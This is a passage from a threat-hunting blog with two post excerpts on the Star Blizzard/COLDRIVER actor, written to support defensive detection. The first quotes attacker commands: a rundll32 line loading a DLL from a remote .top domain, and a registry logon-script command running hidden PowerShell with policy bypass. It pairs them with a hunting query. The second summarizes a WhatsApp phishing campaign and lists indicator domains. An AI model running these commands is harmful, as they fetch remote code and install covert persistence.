Posts

Showing posts with the label Star Blizzard

268. Hunting for COLDRIVER

Image
Hello everyone! Today we'll look into another great report by Zscaler. This time it's on COLDRIVER (also known as Star Blizzard, Callisto, and UNC4057). And it's full of detection and hunting ideas! The threat actor added ClickFix to their arsenal, but leveraged rundll32.exe instead of common cmd.exe , powershell.exe and mshta.exe : rundll32.exe \\captchanom[.]top\check\machinerie.dll,verifyme Here we can hunt for rundll32.exe executing DLLs located on .top (you can experiment with others, of course) domains (and yes, I love hunting for rundll32.exe abuse): event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: *top* The threat actors used Logon Script (T1037.001) for persistence: reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "powershell -WindowStyle Hidden -ep bypass \"%APPDATA%\Microsoft\Windows\FvFLcsr23.ps1\" \"7eHgxjgbBs3gHdkgx9AsRC\"" /f% And yes, it's ano...

017. Star Blizzard and Stolen WhatsApp accounts

Image
Hello everyone! Yesterday Microsoft Threat Intelligence team shared some information on Star Blizzard's campaign targeting WhatsApp accounts.  So, the adversary sends a phishing email a quick response (QR) code purporting to direct users to join a WhatsApp group: An example of phishing email But the QR code is not valid, so if the victim responds with an email, the threat actors send another message, this time with a link, which leads to a phishing page with instructions how to "join the group". The QR code on the page allows the adversary to connect an account to a linked device and/or the WhatsApp Web portal, and exfiltrate messages. Here are the indicators of compromise presented by Microsoft: civilstructgeo[.]org aerofluidthermo[.]org See you tomorrow!